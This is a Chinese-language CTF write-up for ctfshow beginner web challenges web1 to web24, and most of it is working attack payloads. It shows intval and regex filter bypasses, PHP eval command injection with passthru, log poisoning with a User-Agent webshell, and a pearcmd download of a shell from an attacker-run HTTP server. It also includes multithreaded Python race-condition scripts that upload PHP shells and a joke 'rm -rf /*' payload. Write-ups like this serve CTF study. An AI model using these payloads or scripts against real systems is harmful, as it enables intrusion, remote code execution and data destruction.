ctfshow_萌新

web

web1

if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为：$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果，获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

目标就是让intval($id) <= 999的同时$id=1000

?id=999%2B1
+用urlencode->%2B
?id=10 or id=1000#从sql语句入手

web2

和上一题比只多了个

if(preg_match("/or|\+/i",$id))

只要不出现or或者+就可以了

?id=100*10
?id=10||id=1000#从sql语句入手

web3

修改了匹配规则

preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)

intval如果转换字符串的时候，先判断是否以数字开头。当传入’1000’时，以’开头，直接返回0

<?php
$a='1000'
$b=$_GET['b']
当传入?b='1000'时,分别var_dump $a和$b,返回的结果不一样

?id='1000'

web4

preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)

还是web3的原则，利用取反符号，intval遇到~会判断为字符串，得到0绕过

?id=~~1000

web5

preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i", $id)

继续取反

?id=~~1000

web6

preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|x|hex|\(|\)|\+|select/i",$id)

继续

?id=~~1000

web7

preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|\~|x|hex|\(|\)|\+|select/i",$id)

intval默认给的base是10，当base给到0的时候，才会根据传入的值动态判断base。base10解析之后的0b1111101000应该是int(0)

?id=0b1111101000

web8

<?php
# 包含数据库连接文件,key flag 也在里面定义
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['flag'])){
        if(isset($_GET['flag'])){
                $f = $_GET['flag'];
                if($key===$f){
                        echo $flag;
                }
        }
}else{
    highlight_file(__FILE__);
}

?>

傻逼题

?flag=rm -rf /*

web9

if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}

傻逼了，以为看的是!preg_match，最开始用的php://input伪协议绕过

结果这么简单

?c=system('cat config'|base64)

web10

if(!preg_match("/system|exec|highlight/i",$c))

换用passthru()函数

?c=passthru('cat config.php|base64');

web11

if(!preg_match("/system|exec|highlight|cat/i",$c))

passthru+tac

?c=passthru('tac config.php|base64');

web12

if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c))

禁止的字符新增了. php config

考虑使用通配符

?c=passthru('tac c*|base64');

web13

if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c))

亏贼，?>能代替;

?c=passthru('tac c*|base64')?>

web14

if(!preg_match("/system|exec|highlight|cat|\(|\.|\;|file|php|config/i",$c))

多加了个(，其实还挺低能的，在上面也能用统一方法直接echo出来

就是需要把;换成?>

参考

代码不能包含打开/关闭 PHP tags。比如， 'echo "Hi!";' 不能这样传入： '<?php echo "Hi!"; ?>'。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 'echo "In PHP mode!"; ?>In HTML mode!<?php echo "Back in PHP mode!";'。

?c=echo $flag?>

web15

if(!preg_match("/system|\\*|\?|\<|\>|\=|exec|highlight|cat|\(|\.|file|php|config/i",$c))

把<>?全过滤了，没发离开php模式，但没禁用;

?c=echo $flag;

web16

if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e")

脑残，md5逆向之后是ctfshow36d

?c=36d

web17

if(!preg_match("/php/i",$c)){
               include($c);
       }

看到include，第一时间想的伪协议。换用了data也因为被禁用没有成功

data:// wrapper is disabled in the server configuration by allow_url_include=0

看了wp才知道，只是包含日志

?c=/var/log/nginx/access.log

通过日志看得出来会记录UA

那就修改UA为一句话木马

然后访问带着一句话木马的UA访问一遍网站，等写进去再打一遍

?c=/var/log/nginx/access.log
test=system('cat 36d.php|base64');

web18

只在$_GET[‘c’]里多加入了对file的过滤，同上↑

web19

if(!preg_match("/php|file|base/i",$c))

同理

web20

if(!preg_match("/php|file|base|rot/i",$c))

同理

web21

if(!preg_match("/php|file|\:|base|rot/i",$c))

同上

web22

if(!preg_match("/\:|\/|\\\/i",$c))

亏贼，难度一下上来了，完全没有思路

https://blog.csdn.net/qq_46091464/article/details/108954166

‘argv‘

传递给该脚本的参数的数组。当脚本以命令行方式运行时，argv 变量传递给程序 C 语言样式的命令行参数。当通过 GET 方式调用时，该变量包含query string。

‘argc‘

包含命令行模式下传递给该脚本的参数的数目(如果运行在命令行模式下)。

当正常传入?c=xxx&b=xx时，$_SERVER[‘argc’]的值始终是1

但是略加修改，?c=xxx&+b=xx时，就变成了2。

而环境内极其傻逼的还有一个pearcmd.php，pearcmd有一个download功能可以从外部下载php文件

那就是包含了pearcmd.php，然后通过+分隔，执行download命令

攻击机:
echo "<?php system('cat 3*|base64');?>">shell.php
python3 -m http.server 81
靶机:
?c=pearcmd&+download+http://ip:81/shell.php
/shell.php

获得百分之百的快乐

if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}

要求传入1的长度<4，太牛逼了

直接跑个ls，发现名字都很靠后

tip:在linux上，直接执行>name可以创建一个名为name的文件并往里写东西

在Linux的Shell环境下，直接执行星号（*）通常会触发通配符展开（Wildcard Expansion）操作，其效果是匹配当前目录下的所有文件和目录（除了以点开头的隐藏文件和隐藏目录）并将它们作为参数传递给相应的命令。这是因为星号（*）是通配符，用于匹配零个或多个字符。

直接输*会把当前文件夹下的第一个文件名作为命令，剩余的文件名作为参数

如果当前文件夹下有文件：cat，test。执行*的效果等价于cat test

除了cat，还有nl这个命令同样可以用来显示内容

?1=>nl
?1=*

web23

第一次遇到竞争上传，学习一下

其实每次上传成功之后都要等一下就该意识到有个sleep然后想到竞争上传的

源码

$new_filename = date('YmdHis',time()).rand(100,1000).'.'.$ext_suffix;
if (move_uploaded_file($temp_name, 'uploads/'.$new_filename)){
	echo "uploads/$new_filename";
	sleep(1);
	system("rm -rf ./uploads/*.php");
}

有爆破脚本

# coding: utf-8
# Auth: y2hlbmc
 
import requests
import time
import threading
 
url = "http://0d33429a-38e4-4c4e-8d57-16fca7d5eab1.challenge.ctf.show/"
 
def Thread(fun,*args):
    return threading.Thread(target=fun, args=args)
 
def req(fname):
    r = requests.get(url + "uploads/" + fname + ".php")
    x = r.text
    if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
        print(x)
 
def Thread_start(fname):
    for i in range(100,400):
        # 每个文件名单起一个线程
        Thread(req, fname + str(i)).start()
 
def upload():
    while True:
    	# 指定每次上传文件的内容
        file_data = {'file':('shell.php',"<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(url + "upload.php",files=file_data)
        txt = r.text
        print("uploaded:",txt)
        # 用本次的文件名推算下一次的文件名，相差sleep一次的时间间隔
        ts = int(time.mktime(time.strptime(txt[8:22], "%Y%m%d%H%M%S")))
        fname = time.strftime("%Y%m%d%H%M%S", time.localtime(ts + 1))
        # 单起一个线程，爆破下一次upload的文件名
        Thread(Thread_start, fname).start()
 
 
if __name__ == '__main__':
    upload()

当然也可以用bp+python一起爆

具体思路是bp用instruder一直发送上传包

python用当前时间+range+thread一直爆

如果不采用推算文件名和多线程的方法，想要在来回时延下做到1s内访问到是非常困难的，所以下面代码的成功率极低

file_data = {'file': ('shell.php', "<?php system(\"ls -l ../\");?>".encode())}
r = requests.post(url + "upload.php", files = file_data)
txt = r.text
# print("uploaded:", txt)
r = requests.get(url + "uploads/" + txt)
x = r.text
if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
print(x)

web24

一样是竞争上传的题目，把range减少，时间增加了

# coding: utf-8
# Auth: y2hlbmc
 
import requests
import time
import threading
 
url = "http://aa167920-a54b-498c-bf8e-877615061128.challenge.ctf.show/"
 
def Thread(fun,*args):
    return threading.Thread(target=fun, args=args)
 
def req(fname):
    r = requests.get(url + "uploads/" + fname + ".php")
    x = r.text
    if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
        print(x)
 
def Thread_start(fname):
    for i in range(100,300):
        # 每个文件名单起一个线程
        Thread(req, fname + str(i)).start()
 
def upload():
    while True:
    	# 指定每次上传文件的内容
        file_data = {'file':('shell.php',"<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(url + "upload.php",files=file_data)
        txt = r.text
        print("uploaded:",txt)
        # 用本次的文件名推算下一次的文件名，相差sleep一次的时间间隔
        ts = int(time.mktime(time.strptime(txt[8:22], "%Y%m%d%H%M%S")))
        fname = time.strftime("%Y%m%d%H%M%S", time.localtime(ts + 3))
        # 单起一个线程，爆破下一次upload的文件名
        Thread(Thread_start, fname).start()
 
 
if __name__ == '__main__':
    upload()